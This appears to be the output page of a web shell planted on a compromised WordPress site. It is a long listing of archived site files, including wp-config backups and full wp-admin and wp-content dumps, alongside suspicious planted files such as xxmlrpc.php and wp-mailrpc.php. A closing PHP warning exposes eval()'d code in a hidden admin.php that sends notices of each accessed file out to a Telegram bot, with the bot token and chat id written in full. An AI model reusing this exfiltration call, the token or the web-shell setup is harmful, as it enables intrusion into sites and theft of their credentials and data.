voxilabProtocol.class.php.tar.gz File 1.34 KB 0604
voxilabSegment.class.php.tar File 0 B 0604
voxilabSegment.class.php.tar.gz File 1.69 KB 0604
voxilabSpeaker.class.php.tar File 5.5 KB 0604
voxilabSpeaker.class.php.tar.gz File 1.64 KB 0604
voxilabSpeechfile.class.php.tar File 8 KB 0604
voxilabSpeechfile.class.php.tar.gz File 2.13 KB 0604
watch.tar File 3 KB 0604
watch.tar.gz File 729 B 0604
watch.zip File 1.59 KB 0604
watchers.tar File 9.5 KB 0604
watchers.tar.gz File 2.18 KB 0604
watcheslist.tar File 22.5 KB 0604
watcheslist.tar.gz File 3.05 KB 0604
watcheslist.zip File 17.51 KB 0604
wbddf.tar File 1.62 MB 0604
wbddf.tar.gz File 111.34 KB 0604
wbddf.zip File 1.62 MB 0604
widget.tar File 11.5 KB 0604
widget.tar.gz File 3 KB 0604
widget.zip File 10.01 KB 0604
widget_area_1775544288.zip File 152.25 KB 0604
widget_area_1775574980.zip File 150.73 KB 0604
widgets-rtl.css.tar File 37 KB 0604
widgets-rtl.css.tar.gz File 4.07 KB 0604
widgets-rtl.min.css.tar File 16 KB 0604
widgets-rtl.min.css.tar.gz File 3.39 KB 0604
widgets.css.tar File 37 KB 0604
widgets.css.tar.gz File 4.04 KB 0604
widgets.min.css.tar File 16 KB 0604
widgets.min.css.tar.gz File 3.38 KB 0604
widgets.tar File 2 MB 0604
widgets.tar.gz File 180.18 KB 0604
widgets.zip File 2.01 MB 0604
wincher.zip File 11.1 KB 0604
woocommerce-rtl.css.tar File 50 KB 0604
woocommerce-rtl.css.tar.gz File 3.84 KB 0604
woocommerce.css.tar File 123.5 KB 0604
woocommerce.css.tar.gz File 3.84 KB 0604
wordpress-importer.zip File 18.44 KB 0604
wordpress-seo.tar File 5.86 MB 0604
wordpress-seo.tar.gz File 0 B 0604
wordpress-seo.zip File 8.84 MB 0604
wordpress.zip File 11.91 KB 0604
workflow.class.php.tar File 8 KB 0604
workflow.class.php.tar.gz File 1.59 KB 0604
wp-admin-20260529230927-20260621143653.tar File 5.79 MB 0604
wp-admin-20260529230927-20260621143653.tar.gz File 1.11 MB 0604
wp-admin-20260529230927-20260621143653.zip File 5.69 MB 0604
wp-admin-20260529230927.zip File 51.03 MB 0604
wp-admin.css.tar File 3 KB 0604
wp-admin.css.tar.gz File 248 B 0604
wp-admin.min.css.tar File 2 KB 0604
wp-admin.min.css.tar.gz File 278 B 0604
wp-admin.zip File 40.92 MB 0604
wp-api.php.tar File 3 KB 0604
wp-api.php.tar.gz File 673 B 0604
wp-blog-header-20260608000932.php.tar File 2 KB 0604
wp-blog-header-20260608000932.php.tar.gz File 337 B 0604
wp-cli.tar File 8 KB 0604
wp-cli.tar.gz File 1.66 KB 0604
wp-cli.zip File 16.14 KB 0604
wp-config-20260529060810.php.tar File 5.5 KB 0604
wp-config-20260529060810.php.tar.gz File 2.11 KB 0604
wp-config-20260622063703.php.tar File 5.5 KB 0604
wp-config-20260622063703.php.tar.gz File 2.11 KB 0604
wp-config.php.tar File 38.5 KB 0604
wp-config.php.tar.gz File 2.12 KB 0604
wp-content-20260529152145-20260621215028.zip File 44.41 MB 0604
wp-content.tar File 48.78 MB 0604
wp-content.tar.gz File 18.65 MB 0604
wp-content.zip File 133.06 MB 0604
wp-file-manager-pro.tar File 1.29 MB 0604
wp-file-manager-pro.tar.gz File 740.96 KB 0604
wp-file-manager-pro.zip File 1.28 MB 0604
wp-file-manager.zip File 4.03 MB 0604
wp-includes-20260621215820.tar File 3.66 MB 0604
wp-includes-20260621215820.tar.gz File 1.19 MB 0604
wp-includes-20260621215820.zip File 3.65 MB 0604
wp-includes.tar File 3.66 MB 0604
wp-includes.tar.gz File 1.19 MB 0604
wp-includes.zip File 3.65 MB 0604
wp-mailrpc.php.tar File 41 KB 0604
wp-mailrpc.php.tar.gz File 12.88 KB 0604
wp-rest.tar File 7.5 KB 0604
wp-rest.tar.gz File 1.41 KB 0604
wp-rest.zip File 5.52 KB 0604
wp-settings-20260529222804.php.tar File 30 KB 0604
wp-settings-20260529222804.php.tar.gz File 5.91 KB 0604
wpml-config.xml.tar File 4 KB 0604
wpml-config.xml.tar.gz File 490 B 0604
wptt.tar File 23.5 KB 0604
wptt.tar.gz File 5.58 KB 0604
wptt.zip File 21.45 KB 0604
wrapper-part.php.tar File 2.5 KB 0604
wrapper-part.php.tar.gz File 436 B 0604
wrapper.php.tar File 8 KB 0604
wrapper.php.tar.gz File 1.39 KB 0604
wrappers.tar File 4.5 KB 0604
wrappers.tar.gz File 986 B 0604
wrappers.zip File 2.47 KB 0604
writeexcel.tar File 239 KB 0604
writeexcel.tar.gz File 46.68 KB 0604
writeexcel.zip File 233.25 KB 0604
xxmlrpc-20260529112926-20260618082814.php.tar File 3 KB 0604
xxmlrpc-20260529112926-20260618082814.php.tar.gz File 666 B 0604
xxmlrpc-20260529112926-20260622044649.php.tar File 3 KB 0604
xxmlrpc-20260529112926-20260622044649.php.tar.gz File 665 B 0604
xxmlrpc-20260529112926.php.tar File 3 KB 0604
xxmlrpc-20260529112926.php.tar.gz File 658 B 0604
xxmlrpc.php.tar File 5 KB 0604
xxmlrpc.php.tar.gz File 667 B 0604
xymxf.tar File 5 KB 0604
xymxf.tar.gz File 1.26 KB 0604
xymxf.zip File 3.61 KB 0604
xzypi.tar File 4.5 KB 0604
xzypi.tar.gz File 1015 B 0604
xzypi.zip File 2.8 KB 0604
yarn.lock.tar File 683.5 KB 0604
yarn.lock.tar.gz File 264.04 KB 0604
yhos.tar File 4.5 KB 0604
yhos.tar.gz File 1015 B 0604
yhos.zip File 2.8 KB 0604
zen.css.tar File 9 KB 0604
zen.css.tar.gz File 1.95 KB 0604
zen.tar File 232 KB 0604
zen.tar.gz File 38.07 KB 0604
zen.zip File 225.34 KB 0604
zen_color_pre_set.css.tar File 12.5 KB 0604
zen_color_pre_set.css.tar.gz File 1.47 KB 0604
zen_one.css.tar File 10 KB 0604
zen_one.css.tar.gz File 2.2 KB 0604
zen_one.tar File 251.5 KB 0604
zen_one.tar.gz File 42.36 KB 0604
zen_one.zip File 243.41 KB 0604
zonepageo_a.css.tar File 6 KB 0604
zonepageo_a.css.tar.gz File 848 B 0604
zzen_responsive.css.tar File 53.5 KB 0604
zzen_responsive.css.tar.gz File 8.98 KB 0604

Warning: file_get_contents(https://api.telegram.org/bot6480565468:AAHPgwqvr55vU-lBvGV23jlYJuGCrOCL4XM/sendMessage?chat_id=1722171889&text=File+accessed%3A+http%3A%2F%2Fwww.eliteafrique.com%2Fwp-includes%2Fl10n%2Fcss%2Fv3%2Fwbddf%2Fadmin.php%3Fdir%3D%252Fhome%252Feliteafr%252Fwww%252Finc%252Flogin-logo%252Fcss%252Farchive%252Fhxwdw%26read%3D%252Fhome%252Feliteafr%252Fwww%252Finc%252Flogin-logo%252Fcss%252Farchive%252Fhxwdw%252Fclass.phpmailer.php.tar): Failed to open stream: HTTP request failed! HTTP/1.1 429 Too Many Requests in /home/eliteafr/www/wp-includes/l10n/css/v3/wbddf/admin.php(112993) : eval()'d code(18150) : eval()'d code on line 2024